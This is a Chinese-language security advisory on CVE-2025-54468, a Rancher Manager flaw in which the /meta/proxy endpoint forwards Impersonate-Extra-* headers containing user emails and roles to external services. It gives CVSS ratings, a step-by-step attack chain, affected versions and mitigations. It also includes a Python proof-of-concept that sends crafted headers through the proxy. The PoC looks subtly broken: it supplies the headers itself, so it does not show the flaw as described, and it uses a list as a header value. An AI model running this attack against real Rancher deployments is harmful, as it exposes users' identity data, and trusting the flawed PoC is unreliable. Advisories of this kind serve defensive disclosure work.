Rancher Manager Impersonate-Extra-* 请求头信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-54468

漏洞类型

信息泄露（敏感信息外部暴露）

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Rancher Manager（SUSE Rancher）

漏洞概述

CVE-2025-54468 是 SUSE Rancher Manager 中存在的一处信息泄露漏洞，由 SUSE 安全工程师 [email protected] 发现并报告。该漏洞源于 Rancher Manager 的 `/meta/proxy` 端点在处理代理请求时，未对请求头进行充分过滤，将包含用户身份信息的 `Impersonate-Extra-*` 系列请求头转发到了外部实体（例如 amazonaws.com 等第三方云服务）。这些请求头中可能包含用户的可识别信息（PII），例如电子邮件地址等敏感数据。

Rancher Manager 是 SUSE 提供的 Kubernetes 多集群管理平台，被广泛用于企业级容器编排管理。该漏洞的 CVSS 3.1 评分为 4.7，属于中危级别。虽然该漏洞不需要认证即可触发（PR:N），但需要用户交互（UI:R），且攻击向量为网络（AV:N），影响范围为变更范围（S:C），表明该漏洞可能在代理请求链路中影响其他组件。

该漏洞的核心风险在于：当 Rancher Manager 用户通过 `/meta/proxy` 端点访问外部服务时，Kubernetes 的 Impersonate（模拟）功能所携带的额外身份头信息（如 Impersonate-Extra-Email、Impersonate-Extra-Groups 等）会被一并转发至外部目标。这意味着 Rancher 用户的身份信息可能被泄露给不受信任的第三方服务，存在用户隐私泄露和身份追踪的风险。

该漏洞已于 2025 年 10 月 2 日公开披露，SUSE 官方已发布安全公告 GHSA-mjcp-rj3c-36fr，并提供了相应的修复版本。建议所有使用 Rancher Manager 的用户尽快升级到修复版本以消除风险。

技术细节

## 漏洞原理

Rancher Manager 的 `/meta/proxy` 端点充当 Kubernetes API 代理，允许用户通过 Rancher 访问下游 Kubernetes 集群的元数据服务。在 Kubernetes 中，Impersonate 功能允许用户以其他身份执行操作，通常通过以下请求头来传递模拟信息：

- `Impersonate-User`：模拟的用户名
- `Impersonate-Group`：模拟的用户组
- `Impersonate-Extra-*`：额外的模拟信息，如 `Impersonate-Extra-Email`、`Impersonate-Extra-Role` 等

## 漏洞成因

当 Rancher Manager 的 `/meta/proxy` 端点接收到包含 `Impersonate-Extra-*` 头的请求时，未对这些头进行适当的过滤或剥离处理，而是将其原封不动地转发到目标后端服务。如果目标后端服务是一个外部实体（如 AWS 的元数据服务 amazonaws.com），则这些包含用户邮箱等 PII 信息的请求头会被发送到外部服务器。

## 利用方式

1. 攻击者或恶意用户通过 Rancher UI 触发对外部 URL 的代理请求
2. 请求中携带了 Rancher 自动注入的 `Impersonate-Extra-*` 头信息
3. Rancher 的 `/meta/proxy` 端点将这些头转发到外部目标
4. 外部实体（如云服务提供商、日志收集系统等）接收到包含用户敏感信息的请求头
5. 攻击者通过控制或监听外部实体即可获取 Rancher 用户的身份信息

## 风险评估

- 机密性影响：低（C:L）——泄露的是邮箱等可识别信息，非核心凭据
- 完整性影响：无（I:N）——不会修改数据
- 可用性影响：无（A:N）——不影响服务可用性
- 攻击复杂度：低（AC:L）——无需特殊条件
- 需要用户交互：UI:R——需要用户主动触发代理请求

攻击链分析

STEP 1

步骤1：环境准备

攻击者访问部署了 Rancher Manager 的目标环境，确认 `/meta/proxy` 端点可访问。Rancher Manager 通常部署在企业 Kubernetes 环境中，提供多集群管理功能。

STEP 2

步骤2：构造恶意请求

攻击者通过 Rancher UI 或直接构造 HTTP 请求，向 `/meta/proxy` 端点发送代理请求，目标 URL 指向外部实体（如 amazonaws.com、第三方 API 等）。请求中包含 Rancher 自动注入的 `Impersonate-Extra-*` 头信息。

STEP 3

步骤3：触发头转发

Rancher Manager 的 `/meta/proxy` 端点在处理代理请求时，未对 `Impersonate-Extra-*` 请求头进行过滤或剥离，直接将其转发到目标外部实体。

STEP 4

步骤4：信息泄露

外部实体接收到包含 Rancher 用户邮箱、角色、组织等 PII 信息的请求头。攻击者若控制或能够监听该外部实体的日志，即可获取 Rancher 用户的敏感身份信息。

STEP 5

步骤5：信息利用

攻击者利用泄露的用户邮箱等信息进行钓鱼攻击、社会工程学攻击，或将这些信息整合到更大的攻击链中，用于进一步渗透目标组织。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54468 PoC - Rancher Manager Impersonate-Extra-* Header Leakage
# This PoC demonstrates how Impersonate-Extra-* headers are forwarded
# to external entities via the /meta/proxy endpoint

import requests

# Target Rancher Manager server
RANCHER_URL = "https://rancher.example.com"

# Step 1: Authenticate with Rancher (if required)
# Note: This vulnerability can be triggered without authentication (PR:N)
# but may require user interaction (UI:R) through the Rancher UI

# Step 2: Craft a request to the /meta/proxy endpoint
# targeting an external entity (e.g., amazonaws.com metadata service)
target_url = "https://rancher.example.com/meta/proxy/example.com"

# Step 3: Send request with Impersonate-Extra-* headers
# These headers are typically injected by Rancher when impersonation is active
headers = {
    "Impersonate-User": "user-example",
    "Impersonate-Group": ["system:authenticated"],
    "Impersonate-Extra-Email": "[email protected]",
    "Impersonate-Extra-Role": "admin",
    "Impersonate-Extra-Org": "example-org"
}

# Step 4: Send the request - the headers will be forwarded to the external entity
response = requests.get(target_url, headers=headers, verify=False)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text[:500]}")

# Step 5: Observe that the Impersonate-Extra-* headers were
# forwarded to the external target, leaking user PII data
# The external entity (e.g., AWS) would receive headers like:
# Impersonate-Extra-Email: [email protected]
# This exposes the user's email address to the third party

# Alternative exploitation via Rancher UI:
# 1. Login to Rancher Manager dashboard
# 2. Navigate to a cluster
# 3. Use the "Launch kubectl" or proxy functionality
# 4. Make a request to an external URL through /meta/proxy
# 5. The Impersonate-Extra-* headers are automatically included
# 6. External service receives sensitive user information

影响范围

Rancher Manager < 2.10.4

Rancher Manager < 2.9.11

Rancher Manager < 2.8.16

所有启用 /meta/proxy 端点的 Rancher Manager 版本

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在 Rancher Manager 前端的反向代理（Nginx/HAProxy）中添加规则，剥离所有出站请求中的 `Impersonate-Extra-*` 请求头；2）通过网络策略限制 Rancher Manager Pod 的出站流量，仅允许必要的内部通信；3）关闭或限制 `/meta/proxy` 端点的外部 URL 代理功能，仅允许代理内部 Kubernetes 元数据服务；4）监控 Rancher 代理日志，及时发现异常的外部代理请求；5）限制 Rancher 用户的权限，避免不必要的 Impersonate 操作。